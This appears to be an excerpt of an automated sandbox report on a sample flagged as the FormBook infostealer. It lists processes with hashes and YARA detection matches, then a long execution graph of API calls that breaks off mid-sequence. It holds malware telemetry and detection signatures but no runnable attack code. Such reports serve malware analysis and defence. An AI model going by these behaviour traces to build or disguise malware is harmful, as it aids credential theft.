                                                                              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                              Imagebase:0x8c0000
                                                                              File size:22'016 bytes
                                                                              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:7
                                                                              Start time:06:53:22
                                                                              Start date:21/11/2024
                                                                              Path:C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe"
                                                                              Imagebase:0x170000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:8
                                                                              Start time:06:53:34
                                                                              Start date:21/11/2024
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x800000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:4%
                                                                                Dynamic/Decrypted Code Coverage:1.5%
                                                                                Signature Coverage:6.3%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:66
                                                                                execution_graph 93401 8b19cb 93406 842322 93401->93406 93403 8b19d1 93439 860f0a 52 API calls __cinit 93403->93439 93405 8b19db 93407 842344 93406->93407 93440 8426df 93407->93440 93414 84d7f7 48 API calls 93415 84238e 93414->93415 93416 84d7f7 48 API calls 93415->93416 93417 842398 93416->93417 93418 84d7f7 48 API calls 93417->93418 93419 8423de 93418->93419 93420 84d7f7 48 API calls 93419->93420 93421 8424c1 93420->93421 93453 84263f 93421->93453 93425 8424f1 93426 84d7f7 48 API calls 93425->93426 93427 8424fb 93426->93427 93482 842745 93427->93482 93429 842546 93430 842556 GetStdHandle 93429->93430 93431 8425b1 93430->93431 93432 8b501d 93430->93432 93433 8425b7 CoInitialize 93431->93433 93432->93431 93434 8b5026 93432->93434 93433->93403 93489 8892d4 53 API calls 93434->93489 93436 8b502d 93490 8899f9 CreateThread 93436->93490 93438 8b5039 CloseHandle 93438->93433 93439->93405 93491 842854 93440->93491 93444 84234a 93445 84272e 93444->93445 93572 8427ec 6 API calls 93445->93572 93447 84237a 93448 84d7f7 93447->93448 93449 85f4ea 48 API calls 93448->93449 93450 84d818 93449->93450 93451 85f4ea 48 API calls 93450->93451 93452 842384 93451->93452 93452->93414 93454 84d7f7 48 API calls 93453->93454 93455 84264f 93454->93455 93456 84d7f7 48 API calls 93455->93456 93457 842657 93456->93457 93573 8426a7 93457->93573 93460 8426a7 48 API calls 93461 842667 93460->93461 93462 84d7f7 48 API calls 93461->93462 93463 842672 93462->93463 93464 85f4ea 48 API calls 93463->93464 93465 8424cb 93464->93465 93466 8422a4 93465->93466 93467 8422b2 93466->93467 93468 84d7f7 48 API calls 93467->93468 93469 8422bd 93468->93469 93470 84d7f7 48 API calls 93469->93470 93471 8422c8 93470->93471 93472 84d7f7 48 API calls 93471->93472 93473 8422d3 93472->93473 93474 84d7f7 48 API calls 93473->93474 93475 8422de 93474->93475 93476 8426a7 48 API calls 93475->93476 93477 8422e9 93476->93477 93478 85f4ea 48 API calls 93477->93478 93479 8422f0 93478->93479 93480 8b1fe7 93479->93480 93481 8422f9 RegisterWindowMessageW 93479->93481 93481->93425 93483 842755 93482->93483 93484 8b5f4d 93482->93484 93486 85f4ea 48 API calls 93483->93486 93578 88c942 50 API calls 93484->93578 93488 84275d 93486->93488 93487 8b5f58 93488->93429 93489->93436 93490->93438 93579 8899df 54 API calls 93490->93579 93509 842870 93491->93509 93494 842870 48 API calls 93495 842864 93494->93495 93496 84d7f7 48 API calls 93495->93496 93497 842716 93496->93497 93498 846a63 93497->93498 93499 846adf 93498->93499 93502 846a6f __NMSG_WRITE 93498->93502 93529 84b18b 93499->93529 93501 846ab6 ___crtGetEnvironmentStringsW 93501->93444 93503 846ad7 93502->93503 93504 846a8b 93502->93504 93528 84c369 48 API calls 93503->93528 93516 846b4a 93504->93516 93507 846a95 93519 85ee75 93507->93519 93510 84d7f7 48 API calls 93509->93510 93511 84287b 93510->93511 93512 84d7f7 48 API calls 93511->93512 93513 842883 93512->93513 93514 84d7f7 48 API calls 93513->93514 93515 84285c 93514->93515 93515->93494 93533 85f4ea 93516->93533 93518 846b54 93518->93507 93520 85f4ea __calloc_impl 93519->93520 93521 86395c __crtCompareStringA_stat 47 API calls 93520->93521 93522 85f50c 93520->93522 93523 85f50e std::exception::exception 93520->93523 93521->93520 93522->93501 93564 866805 RaiseException 93523->93564 93525 85f538 93565 86673b 47 API calls _free 93525->93565 93527 85f54a 93527->93501 93528->93501 93530 84b1a2 ___crtGetEnvironmentStringsW 93529->93530 93531 84b199 93529->93531 93530->93501 93531->93530 93566 84bdfa 93531->93566 93535 85f4f2 __calloc_impl 93533->93535 93536 85f50c 93535->93536 93537 85f50e std::exception::exception 93535->93537 93542 86395c 93535->93542 93536->93518 93556 866805 RaiseException 93537->93556 93539 85f538 93557 86673b 47 API calls _free 93539->93557 93541 85f54a 93541->93518 93543 8639d7 __calloc_impl 93542->93543 93545 863968 __calloc_impl 93542->93545 93563 867c0e 47 API calls __getptd_noexit 93543->93563 93544 863973 93544->93545 93558 8681c2 47 API calls __NMSG_WRITE 93544->93558 93559 86821f 47 API calls 6 library calls 93544->93559 93560 861145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93544->93560 93545->93544 93548 86399b RtlAllocateHeap 93545->93548 93551 8639c3 93545->93551 93554 8639c1 93545->93554 93548->93545 93549 8639cf 93548->93549 93549->93535 93561 867c0e 47 API calls __getptd_noexit 93551->93561 93562 867c0e 47 API calls __getptd_noexit 93554->93562 93556->93539 93557->93541 93558->93544 93559->93544 93561->93554 93562->93549 93563->93549 93564->93525 93565->93527 93567 84be0d 93566->93567 93571 84be0a ___crtGetEnvironmentStringsW 93566->93571 93568 85f4ea 48 API calls 93567->93568 93569 84be17 93568->93569 93570 85ee75 48 API calls 93569->93570 93570->93571 93571->93530 93572->93447 93574 84d7f7 48 API calls 93573->93574 93575 8426b0 93574->93575 93576 84d7f7 48 API calls 93575->93576 93577 84265f 93576->93577 93577->93460 93578->93487 93580 eaff08 93594 eadb58 93580->93594 93582 eaffea 93597 eafdf8 93582->93597 93600 eb1018 GetPEB 93594->93600 93596 eae1e3 93596->93582 93598 eafe01 Sleep 93597->93598 93599 eafe0f 93598->93599 93601 eb1042 93600->93601 93601->93596 93602 84ef80 93605 853b70 93602->93605 93604 84ef8c 93606 853bc8 93605->93606 93618 8542a5 93605->93618 93607 853bef 93606->93607 93609 8b6fd1 93606->93609 93611 8b6f7e 93606->93611 93619 8b6f9b 93606->93619 93608 85f4ea 48 API calls 93607->93608 93610 853c18 93608->93610 93700 89ceca 335 API calls Mailbox 93609->93700 93613 85f4ea 48 API calls 93610->93613 93611->93607 93614 8b6f87 93611->93614 93638 853c2c __NMSG_WRITE ___crtGetEnvironmentStringsW 93613->93638 93697 89d552 335 API calls Mailbox 93614->93697 93615 8b6fbe 93699 88cc5c 86 API calls 4 library calls 93615->93699 93712 88cc5c 86 API calls 4 library calls 93618->93712 93619->93615 93698 89da0e 335 API calls 2 library calls 93619->93698 93620 8542f2 93719 88cc5c 86 API calls 4 library calls 93620->93719 93623 8b73b0 93623->93604 93624 8b737a 93718 88cc5c 86 API calls 4 library calls 93624->93718 93625 8b7297 93708 88cc5c 86 API calls 4 library calls 93625->93708 93630 8b707e 93701 88cc5c 86 API calls 4 library calls 93630->93701 93632 85dce0 53 API calls 93632->93638 93633 8540df 93709 88cc5c 86 API calls 4 library calls 93633->93709 93637 84d645 53 API calls 93637->93638 93638->93618 93638->93620 93638->93624 93638->93625 93638->93630 93638->93632 93638->93633 93638->93637 93641 8b72d2 93638->93641 93642 84fe30 335 API calls 93638->93642 93644 8b7350 93638->93644 93646 8b72e9 93638->93646 93647 8b7363 93638->93647 93651 846a63 48 API calls 93638->93651 93653 8b714c 93638->93653 93654 84d286 48 API calls 93638->93654 93655 85f4ea 48 API calls 93638->93655 93658 853f2b 93638->93658 93659 8b733f 93638->93659 93660 846eed 48 API calls 93638->93660 93664 85ee75 48 API calls 93638->93664 93668 8b71e1 93638->93668 93677 84d9a0 53 API calls __cinit 93638->93677 93678 84d83d 53 API calls 93638->93678 93679 84cdb9 48 API calls 93638->93679 93680 84d6e9 93638->93680 93684 85c15c 48 API calls 93638->93684 93685 85c050 93638->93685 93696 85becb 335 API calls 93638->93696 93702 84dcae 50 API calls Mailbox 93638->93702 93703 89ccdc 48 API calls 93638->93703 93704 88a1eb 50 API calls 93638->93704 93710 88cc5c 86 API calls 4 library calls 93641->93710 93642->93638 93716 88cc5c 86 API calls 4 library calls 93644->93716 93711 88cc5c 86 API calls 4 library calls 93646->93711 93717 88cc5c 86 API calls 4 library calls 93647->93717 93651->93638 93705 89ccdc 48 API calls 93653->93705 93654->93638 93655->93638 93658->93604 93715 88cc5c 86 API calls 4 library calls 93659->93715 93660->93638 93663 8b71a1 93707 85c15c 48 API calls 93663->93707 93664->93638 93668->93658 93714 88cc5c 86 API calls 4 library calls 93668->93714 93670 8b715f 93670->93663 93706 89ccdc 48 API calls 93670->93706 93671 8b71ce 93672 85c050 48 API calls 93671->93672 93674 8b71d6 93672->93674 93673 8b71ab 93673->93618 93673->93671 93674->93668 93675 8b7313 93674->93675 93713 88cc5c 86 API calls 4 library calls 93675->93713 93677->93638 93678->93638 93679->93638 93681 84d6f4 93680->93681 93682 84d71b 93681->93682 93720 84d764 55 API calls 93681->93720 93682->93638 93684->93638 93686 85c064 93685->93686 93688 85c069 Mailbox 93685->93688 93721 85c1af 48 API calls 93686->93721 93694 85c077 93688->93694 93722 85c15c 48 API calls 93688->93722 93690 85f4ea 48 API calls 93691 85c108 93690->93691 93693 85f4ea 48 API calls 93691->93693 93692 85c152 93692->93638 93695 85c113 93693->93695 93694->93690 93694->93692 93695->93638 93695->93695 93696->93638 93697->93658 93698->93615 93699->93609 93700->93638 93701->93658 93702->93638 93703->93638 93704->93638 93705->93670 93706->93670 93707->93673 93708->93633 93709->93658 93710->93646 93711->93658 93712->93658 93713->93658 93714->93658 93715->93658 93716->93658 93717->93658 93718->93658 93719->93623 93720->93682 93721->93688 93722->93694 93723 843742 93724 84374b 93723->93724 93725 8437c6 93724->93725 93726 8437c8 93724->93726 93727 843769 93724->93727 93728 8437ab DefWindowProcW 93725->93728 93729 8437ce 93726->93729 93730 8b1e00 93726->93730 93731 843776 93727->93731 93732 84382c PostQuitMessage 93727->93732 93733 8437b9 93728->93733 93734 8437f6 SetTimer RegisterWindowMessageW 93729->93734 93735 8437d3 93729->93735 93778 842ff6 16 API calls 93730->93778 93737 8b1e88 93731->93737 93738 843781 93731->93738 93732->93733 93734->93733 93739 84381f CreatePopupMenu 93734->93739 93743 8b1da3 93735->93743 93744 8437da KillTimer 93735->93744 93793 884ddd 60 API calls _memset 93737->93793 93740 843836 93738->93740 93741 843789 93738->93741 93739->93733 93768 85eb83 93740->93768 93747 843794 93741->93747 93748 8b1e6d 93741->93748 93751 8b1da8 93743->93751 93752 8b1ddc MoveWindow 93743->93752 93775 843847 Shell_NotifyIconW _memset 93744->93775 93745 8b1e27 93779 85e312 335 API calls Mailbox 93745->93779 93754 84379f 93747->93754 93755 8b1e58 93747->93755 93748->93728 93792 87a5f3 48 API calls 93748->93792 93749 8b1e9a 93749->93728 93749->93733 93756 8b1dcb SetFocus 93751->93756 93757 8b1dac 93751->93757 93752->93733 93754->93728 93780 843847 Shell_NotifyIconW _memset 93754->93780 93791 8855bd 70 API calls _memset 93755->93791 93756->93733 93757->93754 93759 8b1db5 93757->93759 93758 8437ed 93776 84390f DeleteObject DestroyWindow Mailbox 93758->93776 93777 842ff6 16 API calls 93759->93777 93764 8b1e68 93764->93733 93766 8b1e4c 93781 844ffc 93766->93781 93769 85ec1c 93768->93769 93770 85eb9a _memset 93768->93770 93769->93733 93794 8451af 93770->93794 93772 85ec05 KillTimer SetTimer 93772->93769 93773 85ebc1 93773->93772 93774 8b3c7a Shell_NotifyIconW 93773->93774 93774->93772 93775->93758 93776->93733 93777->93733 93778->93745 93779->93754 93780->93766 93782 845027 _memset 93781->93782 93870 844c30 93782->93870 93785 8450ac 93787 8b3d28 Shell_NotifyIconW 93785->93787 93788 8450ca Shell_NotifyIconW 93785->93788 93789 8451af 50 API calls 93788->93789 93790 8450df 93789->93790 93790->93725 93791->93764 93792->93725 93793->93749 93795 8452a2 Mailbox 93794->93795 93796 8451cb 93794->93796 93795->93773 93816 846b0f 93796->93816 93799 8451e6 93801 846a63 48 API calls 93799->93801 93800 8b3ca1 LoadStringW 93802 8b3cbb 93800->93802 93803 8451fb 93801->93803 93805 84510d 48 API calls 93802->93805 93803->93802 93804 84520c 93803->93804 93806 845216 93804->93806 93807 8452a7 93804->93807 93810 8b3cc5 93805->93810 93821 84510d 93806->93821 93830 846eed 93807->93830 93812 845220 _memset _wcscpy 93810->93812 93834 84518c 93810->93834 93814 845288 Shell_NotifyIconW 93812->93814 93813 8b3ce7 93815 84518c 48 API calls 93813->93815 93814->93795 93815->93812 93817 85f4ea 48 API calls 93816->93817 93818 846b34 93817->93818 93819 846b4a 48 API calls 93818->93819 93820 8451d9 93819->93820 93820->93799 93820->93800 93822 84511f 93821->93822 93823 8b1be7 93821->93823 93844 84b384 93822->93844 93853 87a58f 48 API calls ___crtGetEnvironmentStringsW 93823->93853 93826 84512b 93826->93812 93827 8b1bf1 93828 846eed 48 API calls 93827->93828 93829 8b1bf9 Mailbox 93828->93829 93831 846f00 93830->93831 93832 846ef8 93830->93832 93831->93812 93859 84dd47 48 API calls ___crtGetEnvironmentStringsW 93832->93859 93835 845197 93834->93835 93836 8b1ace 93835->93836 93837 84519f 93835->93837 93839 846b4a 48 API calls 93836->93839 93860 845130 93837->93860 93841 8b1adb __NMSG_WRITE 93839->93841 93840 8451aa 93840->93813 93842 85ee75 48 API calls 93841->93842 93843 8b1b07 ___crtGetEnvironmentStringsW 93842->93843 93845 84b392 93844->93845 93852 84b3c5 ___crtGetEnvironmentStringsW 93844->93852 93846 84b3fd 93845->93846 93847 84b3b8 93845->93847 93845->93852 93849 85f4ea 48 API calls 93846->93849 93854 84bb85 93847->93854 93850 84b407 93849->93850 93851 85f4ea 48 API calls 93850->93851 93851->93852 93852->93826 93853->93827 93855 84bb9b 93854->93855 93858 84bb96 ___crtGetEnvironmentStringsW 93854->93858 93856 85ee75 48 API calls 93855->93856 93857 8b1b77 93855->93857 93856->93858 93857->93857 93858->93852 93859->93831 93861 84513f __NMSG_WRITE 93860->93861 93862 845151 93861->93862 93863 8b1b27 93861->93863 93864 84bb85 48 API calls 93862->93864 93865 846b4a 48 API calls 93863->93865 93866 84515e ___crtGetEnvironmentStringsW 93864->93866 93867 8b1b34 93865->93867 93866->93840 93868 85ee75 48 API calls 93867->93868 93869 8b1b57 ___crtGetEnvironmentStringsW 93868->93869 93871 844c44 93870->93871 93872 8b3c33 93870->93872 93871->93785 93874 885819 61 API calls _W_store_winword 93871->93874 93872->93871 93873 8b3c3c DestroyIcon 93872->93873 93873->93871 93874->93785 93875 8b9bec 93900 850ae0 Mailbox ___crtGetEnvironmentStringsW 93875->93900 93877 85f4ea 48 API calls 93877->93900 93880 85f4ea 48 API calls 93903 84fec8 93880->93903 93881 8515b5 94052 88cc5c 86 API calls 4 library calls 93881->94052 93882 851526 Mailbox 94051 88cc5c 86 API calls 4 library calls 93882->94051 93884 850509 94054 88cc5c 86 API calls 4 library calls 93884->94054 93886 85146e 93892 846eed 48 API calls 93886->93892 93888 851473 94053 88cc5c 86 API calls 4 library calls 93888->94053 93889 8ba246 93896 846eed 48 API calls 93889->93896 93890 8ba922 93905 84ffe1 Mailbox 93892->93905 93894 846eed 48 API calls 93894->93903 93896->93905 93897 8ba873 93898 8797ed InterlockedDecrement 93898->93903 93899 84d7f7 48 API calls 93899->93903 93900->93877 93900->93882 93900->93903 93900->93905 93912 8ba706 93900->93912 93914 8797ed InterlockedDecrement 93900->93914 93918 84fe30 93900->93918 93947 896ff0 93900->93947 93956 8a0d1d 93900->93956 93959 8a0d09 93900->93959 93962 89f0ac 93900->93962 93994 88a6ef 93900->93994 94000 84ce19 93900->94000 94006 89e822 93900->94006 94048 89ef61 82 API calls 2 library calls 93900->94048 93901 8ba30e 93901->93905 94049 8797ed InterlockedDecrement 93901->94049 93903->93880 93903->93881 93903->93884 93903->93886 93903->93888 93903->93889 93903->93894 93903->93898 93903->93899 93903->93901 93904 860f0a 52 API calls __cinit 93903->93904 93903->93905 93907 8ba973 93903->93907 94046 851820 335 API calls 2 library calls 93903->94046 94047 851d10 59 API calls Mailbox 93903->94047 93904->93903 94055 88cc5c 86 API calls 4 library calls 93907->94055 93909 8ba982 94050 88cc5c 86 API calls 4 library calls 93912->94050 93914->93900 93919 84fe50 93918->93919 93945 84fe7e 93918->93945 93920 85f4ea 48 API calls 93919->93920 93920->93945 93921 85146e 93922 846eed 48 API calls 93921->93922 93946 84ffe1 93922->93946 93923 85f4ea 48 API calls 93923->93945 93924 84d7f7 48 API calls 93924->93945 93925 850509 94061 88cc5c 86 API calls 4 library calls 93925->94061 93929 8ba246 93932 846eed 48 API calls 93929->93932 93930 8ba922 93930->93900 93931 851473 94060 88cc5c 86 API calls 4 library calls 93931->94060 93932->93946 93934 846eed 48 API calls 93934->93945 93936 8ba873 93936->93900 93937 8ba30e 93937->93946 94058 8797ed InterlockedDecrement 93937->94058 93938 860f0a 52 API calls __cinit 93938->93945 93939 8797ed InterlockedDecrement 93939->93945 93941 8ba973 94062 88cc5c 86 API calls 4 library calls 93941->94062 93943 8515b5 94059 88cc5c 86 API calls 4 library calls 93943->94059 93944 8ba982 93945->93921 93945->93923 93945->93924 93945->93925 93945->93929 93945->93931 93945->93934 93945->93937 93945->93938 93945->93939 93945->93941 93945->93943 93945->93946 94056 851820 335 API calls 2 library calls 93945->94056 94057 851d10 59 API calls Mailbox 93945->94057 93946->93900 94063 84936c 93947->94063 93949 89702a 94083 84b470 93949->94083 93951 89703a 93952 89705f 93951->93952 93953 84fe30 335 API calls 93951->93953 93955 897063 93952->93955 94111 84cdb9 48 API calls 93952->94111 93953->93952 93955->93900 94129 89f8ae 93956->94129 93958 8a0d2d 93958->93900 93960 89f8ae 129 API calls 93959->93960 93961 8a0d19 93960->93961 93961->93900 93963 84d7f7 48 API calls 93962->93963 93964 89f0c0 93963->93964 93965 84d7f7 48 API calls 93964->93965 93966 89f0c8 93965->93966 93967 84d7f7 48 API calls 93966->93967 93968 89f0d0 93967->93968 93969 84936c 81 API calls 93968->93969 93973 89f0de 93969->93973 93970 846a63 48 API calls 93970->93973 93971 84c799 48 API calls 93971->93973 93972 89f2f9 Mailbox 93972->93900 93973->93970 93973->93971 93973->93972 93975 89f2b3 93973->93975 93977 89f2ce 93973->93977 93980 846eed 48 API calls 93973->93980 93981 84bdfa 48 API calls 93973->93981 93985 89f2cc 93973->93985 93987 84bdfa 48 API calls 93973->93987 93991 84936c 81 API calls 93973->93991 93992 84510d 48 API calls 93973->93992 93993 84518c 48 API calls 93973->93993 93976 84518c 48 API calls 93975->93976 93978 89f2c0 93976->93978 93979 84518c 48 API calls 93977->93979 93982 84510d 48 API calls 93978->93982 93983 89f2dd 93979->93983 93980->93973 93984 89f175 CharUpperBuffW 93981->93984 93982->93985 93986 84510d 48 API calls 93983->93986 94255 84d645 93984->94255 93985->93972 94266 846b68 48 API calls 93985->94266 93986->93985 93989 89f23a CharUpperBuffW 93987->93989 94265 85d922 55 API calls 2 library calls 93989->94265 93991->93973 93992->93973 93993->93973 93995 88a6fb 93994->93995 93996 85f4ea 48 API calls 93995->93996 93997 88a709 93996->93997 93998 88a717 93997->93998 93999 84d7f7 48 API calls 93997->93999 93998->93900 93999->93998 94001 84ce28 __NMSG_WRITE 94000->94001 94002 85ee75 48 API calls 94001->94002 94003 84ce50 ___crtGetEnvironmentStringsW 94002->94003 94004 85f4ea 48 API calls 94003->94004 94005 84ce66 94004->94005 94005->93900 94007 89e868 94006->94007 94008 89e84e 94006->94008 94271 89ccdc 48 API calls 94007->94271 94270 88cc5c 86 API calls 4 library calls 94008->94270 94011 89e871 94012 84fe30 334 API calls 94011->94012 94013 89e8cf 94012->94013 94014 89e96a 94013->94014 94016 89e916 94013->94016 94045 89e860 Mailbox 94013->94045 94015 89e978 94014->94015 94020 89e9c7 94014->94020 94290 88a69d 48 API calls 94015->94290 94272 889b72 48 API calls 94016->94272 94019 89e949 94273 8545e0 94019->94273 94021 84936c 81 API calls 94020->94021 94020->94045 94024 89e9e1 94021->94024 94022 89e99b 94291 84bc74 48 API calls 94022->94291 94026 84bdfa 48 API calls 94024->94026 94028 89ea05 CharUpperBuffW 94026->94028 94027 89e9a3 Mailbox 94292 853200 94027->94292 94029 89ea1f 94028->94029 94031 89ea72 94029->94031 94032 89ea26 94029->94032 94033 84936c 81 API calls 94031->94033 94318 889b72 48 API calls 94032->94318 94034 89ea7a 94033->94034 94319 841caa 49 API calls 94034->94319 94037 89ea54 94038 8545e0 334 API calls 94037->94038 94038->94045 94039 89ea84 94040 84936c 81 API calls 94039->94040 94039->94045 94041 89ea9f 94040->94041 94320 84bc74 48 API calls 94041->94320 94043 89eaaf 94044 853200 334 API calls 94043->94044 94044->94045 94045->93900 94046->93903 94047->93903 94048->93900 94049->93905 94050->93882 94051->93905 94052->93905 94053->93897 94054->93890 94055->93909 94056->93945 94057->93945 94058->93946 94059->93946 94060->93936 94061->93930 94062->93944 94064 849384 94063->94064 94065 849380 94063->94065 94066 8b4cbd __i64tow 94064->94066 94067 8b4bbf 94064->94067 94068 849398 94064->94068 94074 8493b0 __itow Mailbox _wcscpy 94064->94074 94065->93949 94069 8b4bc8 94067->94069 94070 8b4ca5 94067->94070 94112 86172b 80 API calls 3 library calls 94068->94112 94069->94074 94076 8b4be7 94069->94076 94113 86172b 80 API calls 3 library calls 94070->94113 94073 85f4ea 48 API calls 94075 8493ba 94073->94075 94074->94073 94075->94065 94078 84ce19 48 API calls 94075->94078 94077 85f4ea 48 API calls 94076->94077 94079 8b4c04 94077->94079 94078->94065 94080 85f4ea 48 API calls 94079->94080 94081 8b4c2a 94080->94081 94081->94065 94082 84ce19 48 API calls 94081->94082 94082->94065 94084 846b0f 48 API calls 94083->94084 94090 84b495 94084->94090 94085 84b69b 94116 84ba85 94085->94116 94087 84b6b5 Mailbox 94087->93951 94090->94085 94091 8b3939 ___crtGetEnvironmentStringsW 94090->94091 94092 84bcce 48 API calls 94090->94092 94093 84ba85 48 API calls 94090->94093 94094 8b397b 94090->94094 94097 84b9e4 94090->94097 94103 8b3909 94090->94103 94104 84bb85 48 API calls 94090->94104 94108 84bdfa 48 API calls 94090->94108 94114 84c413 59 API calls 94090->94114 94115 84bc74 48 API calls 94090->94115 94124 84c6a5 49 API calls 94090->94124 94125 84c799 48 API calls ___crtGetEnvironmentStringsW 94090->94125 94126 8826bc 88 API calls 4 library calls 94091->94126 94092->94090 94093->94090 94127 8826bc 88 API calls 4 library calls 94094->94127 94128 8826bc 88 API calls 4 library calls 94097->94128 94098 8b3973 94098->94087 94101 8b3989 94102 84ba85 48 API calls 94101->94102 94102->94098 94105 846b4a 48 API calls 94103->94105 94104->94090 94106 8b3914 94105->94106 94110 85f4ea 48 API calls 94106->94110 94109 84b66c CharUpperBuffW 94108->94109 94109->94090 94110->94091 94111->93955 94112->94074 94113->94074 94114->94090 94115->94090 94117 84bb25 94116->94117 94121 84ba98 ___crtGetEnvironmentStringsW 94116->94121 94119 85f4ea 48 API calls 94117->94119 94118 85f4ea 48 API calls 94120 84ba9f 94118->94120 94119->94121 94122 85f4ea 48 API calls 94120->94122 94123 84bac8 94120->94123 94121->94118 94122->94123 94123->94087 94124->94090 94125->94090 94126->94098 94127->94101 94128->94098 94130 84936c 81 API calls 94129->94130 94131 89f8ea 94130->94131 94153 89f92c Mailbox 94131->94153 94165 8a0567 94131->94165 94133 89fb8b 94134 89fcfa 94133->94134 94138 89fb95 94133->94138 94229 8a0688 89 API calls Mailbox 94134->94229 94137 89fd07 94137->94138 94140 89fd13 94137->94140 94178 89f70a 94138->94178 94139 84936c 81 API calls 94158 89f984 Mailbox 94139->94158 94140->94153 94145 89fbc9 94192 85ed18 94145->94192 94148 89fbfd 94151 85c050 48 API calls 94148->94151 94149 89fbe3 94227 88cc5c 86 API calls 4 library calls 94149->94227 94154 89fc14 94151->94154 94152 89fbee GetCurrentProcess TerminateProcess 94152->94148 94153->93958 94155 851b90 48 API calls 94154->94155 94164 89fc3e 94154->94164 94157 89fc2d 94155->94157 94156 89fd65 94156->94153 94161 89fd7e FreeLibrary 94156->94161 94159 8a040f 105 API calls 94157->94159 94158->94133 94158->94139 94158->94153 94158->94158 94225 8a29e8 48 API calls ___crtGetEnvironmentStringsW 94158->94225 94226 89fda5 60 API calls 2 library calls 94158->94226 94159->94164 94161->94153 94164->94156 94196 851b90 94164->94196 94212 8a040f 94164->94212 94228 84dcae 50 API calls Mailbox 94164->94228 94166 84bdfa 48 API calls 94165->94166 94167 8a0582 CharLowerBuffW 94166->94167 94230 881f11 94167->94230 94171 84d7f7 48 API calls 94172 8a05bb 94171->94172 94237 8469e9 48 API calls ___crtGetEnvironmentStringsW 94172->94237 94174 8a061a Mailbox 94174->94158 94175 8a05d2 94176 84b18b 48 API calls 94175->94176 94177 8a05de Mailbox 94176->94177 94177->94174 94238 89fda5 60 API calls 2 library calls 94177->94238 94179 89f725 94178->94179 94180 89f77a 94178->94180 94181 85f4ea 48 API calls 94179->94181 94184 8a0828 94180->94184 94183 89f747 94181->94183 94182 85f4ea 48 API calls 94182->94183 94183->94180 94183->94182 94185 8a0a53 Mailbox 94184->94185 94190 8a084b _strcat _wcscpy __NMSG_WRITE 94184->94190 94185->94145 94186 84cf93 58 API calls 94186->94190 94187 84d286 48 API calls 94187->94190 94188 84936c 81 API calls 94188->94190 94189 86395c 47 API calls __crtCompareStringA_stat 94189->94190 94190->94185 94190->94186 94190->94187 94190->94188 94190->94189 94241 888035 50 API calls __NMSG_WRITE 94190->94241 94194 85ed2d 94192->94194 94193 85edc5 VirtualProtect 94195 85ed93 94193->94195 94194->94193 94194->94195 94195->94148 94195->94149 94197 851cf6 94196->94197 94200 851ba2 94196->94200 94197->94164 94199 851c5d 94199->94164 94201 85f4ea 48 API calls 94200->94201 94210 851bae 94200->94210 94202 8b49c4 94201->94202 94203 85f4ea 48 API calls 94202->94203 94211 8b49cf 94203->94211 94204 851bb9 94204->94199 94205 85f4ea 48 API calls 94204->94205 94206 851c9f 94205->94206 94208 851cb2 94206->94208 94242 842925 48 API calls 94206->94242 94208->94164 94209 85f4ea 48 API calls 94209->94211 94210->94204 94243 85c15c 48 API calls 94210->94243 94211->94209 94211->94210 94213 8a0427 94212->94213 94224 8a0443 94212->94224 94214 8a04f8 94213->94214 94215 8a042e 94213->94215 94216 8a044f 94213->94216 94213->94224 94253 889dc5 103 API calls 94214->94253 94250 887c56 50 API calls _strlen 94215->94250 94252 84cdb9 48 API calls 94216->94252 94217 8a051e 94217->94164 94222 8a0438 94251 84cdb9 48 API calls 94222->94251 94224->94217 94244 861c9d 94224->94244 94225->94158 94226->94158 94227->94152 94228->94164 94229->94137 94231 881f3b __NMSG_WRITE 94230->94231 94232 881f79 94231->94232 94234 881f6f 94231->94234 94236 881ffa 94231->94236 